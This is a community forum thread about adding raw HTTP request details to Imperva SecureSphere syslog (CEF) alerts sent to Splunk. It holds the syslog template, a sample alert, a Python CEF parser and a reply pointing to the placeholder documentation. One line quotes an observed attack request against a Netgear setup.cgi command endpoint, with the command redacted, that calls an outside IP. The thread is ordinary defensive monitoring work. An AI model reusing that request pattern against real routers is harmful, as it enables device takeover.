Imperva Cyber Community


Is it possible to add raw data (user's request) to syslog or exported csv file?

  • 1.  Is it possible to add raw data (user's request) to syslog or exported csv file?

    Posted 01-23-2023 02:21
    hello?

    I'm sending detection events from SecureSphere to Splunk using syslog.

    The syslog settings are:

    CEF:0|Imperva Inc.|SecureSphere|${SecureSphereVersion}|${Alert.alertType}|#cefEscapeMessage(${Alert.alertMetadata.alertName})|${Alert.severity}|act=${Alert.immediateAction} dst=${Event.destInfo.serverIp} dpt=${Event.destInfo.serverPort} duser=#cefEscapeExtension(${Alert.username}) src=${Event.sourceInfo.sourceIp} spt=${Event.sourceInfo.sourcePort} proto=${Event.sourceInfo.ipProtocol} rt=#arcsightDate(${Alert.createTime}) cat=Alert cs1=#cefEscapeExtension(${Rule.parent.displayName}) cs1Label=Policy cs2=#cefEscapeExtension(${Alert.serverGroupName}) cs2Label=ServerGroup cs3=#cefEscapeExtension(${Alert.serviceName}) cs3Label=ServiceName cs4=#cefEscapeExtension(${Alert.applicationName}) cs4Label=ApplicationName cs5=#cefEscapeExtension(${Alert.description}) cs5Label=Description

    The logs received from Splunk are:

    10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP rt=2023/01/21 17:51:05/08/30 14:48:37 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy cs2=Server_Zone_2 cs2Label=ServerGroup cs3=Service_Zone_2 cs3Label=ServiceName cs4=Default Web Application cs4Label=ApplicationName cs5="Multiple Nuclei Scanner(+)" cs5Label=Description


    When analyzing an attack, this information is sometimes lacking.

    Actually SecureSphere logs more information like URL, parameter, header.

    GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=[attack command]http://30.30.30.30:45537/~~~~   HTTP/1.0

    If the above information were included in the syslog, the analysis would be much more helpful.

    I wonder if such a setup is currently possible in SecureSphere.

    If I can't do it via syslog, is there another way? Exporting the detection log to csv did not confirm this information.

    I look forward to your reply.

    Thank you.
    #On-PremisesWAF(formerlySecuresphere)

    ------------------------------
    Seungyeon han
    ceo
    Yeungnam University College
    Seoul
    ------------------------------

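A small parser for CEF lines of the kind shown above, added here as an example (it is not Imperva's code and not part of the thread): it decodes the seven header fields and the extension key=value pairs, honouring the `\|` and `\=` escapes that `#cefEscapeMessage`/`#cefEscapeExtension` produce, and reports which request-detail keys an event lacks. The sample line is constructed from the Splunk output in the post; `request`, `requestMethod` and `cs6` are standard CEF extension keys used here as an assumed target for the extra fields, since the placeholder-to-key mapping is site-specific.

```python
import re

# Constructed sample, modelled on the line the post shows arriving in Splunk (syslog host prefix included).
SAMPLE = ('10.10.10.10 CEF:0|Imperva Inc.|SecureSphere|13.6.0|Protocol|Illegal Parameter Encoding|Low|'
          'act=None dst=20.20.20.20 dpt=80 duser=n/a src=45.146.165.129 spt=53387 proto=TCP '
          'rt=2023/01/21 17:51:05 cat=Alert cs1=HTTP/1.x Protocol Policy cs1Label=Policy '
          'cs2=Server_Zone_2 cs2Label=ServerGroup cs5="Multiple Nuclei Scanner(+)" cs5Label=Description')

HEADER_KEYS = ("version", "vendor", "product", "device_version", "signature_id", "name", "severity")


def _split_header(msg):
    """Split the 7 pipe-delimited header fields; a backslash escapes the next character ('\\|', '\\\\')."""
    fields, cur, i = [], [], 0
    while i < len(msg) and len(fields) < 7:
        ch = msg[i]
        if ch == '\\' and i + 1 < len(msg):
            cur.append(msg[i + 1]); i += 2; continue
        if ch == '|':
            fields.append(''.join(cur)); cur = []; i += 1; continue
        cur.append(ch); i += 1
    return fields, msg[i:]          # remainder is the extension part


def parse_cef(line):
    """Parse one CEF line (optionally prefixed by syslog host/timestamp) into a dict."""
    start = line.find("CEF:")
    if start < 0:
        raise ValueError("not a CEF message")
    header, ext = _split_header(line[start + len("CEF:"):])
    if len(header) != 7:
        raise ValueError("CEF header must have 7 fields")
    out = dict(zip(HEADER_KEYS, header))
    out["ext"] = {}
    # Extension values may contain spaces; a new pair starts only at ' key=' (an escaped '\=' never does).
    for tok in re.split(r' (?=[A-Za-z0-9_]+=)', ext):
        if not tok:
            continue
        key, _, val = tok.partition('=')
        out["ext"][key] = val.replace('\\=', '=').replace('\\\\', '\\')
    return out


def missing_request_fields(ev):
    """Which request-detail keys (assumed CEF names) are absent, i.e. what the analyst will not see."""
    wanted = ("request", "requestMethod", "cs6")
    return [k for k in wanted if k not in ev["ext"]]
```

Running `missing_request_fields(parse_cef(SAMPLE))` on the constructed line lists all three keys, which is exactly the gap the post describes.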

  • 2.  RE: Is it possible to add raw data (user's request) to syslog or exported csv file?

    Posted 01-23-2023 10:17
    You can add those fields by customizing the syslog output. What you are looking for are the placeholders that add the needed values.

    Please reference these two documents:

    1. v14.x Standard Placeholders
    2. v13.6 Standard Placeholders (File says DAM but it includes WAF placeholders)


    ------------------------------
    Sarvesh Lad
    Tech Lead @ On-Prem Managed Services (WAF, DAM, DRA & Sonar)
    ------------------------------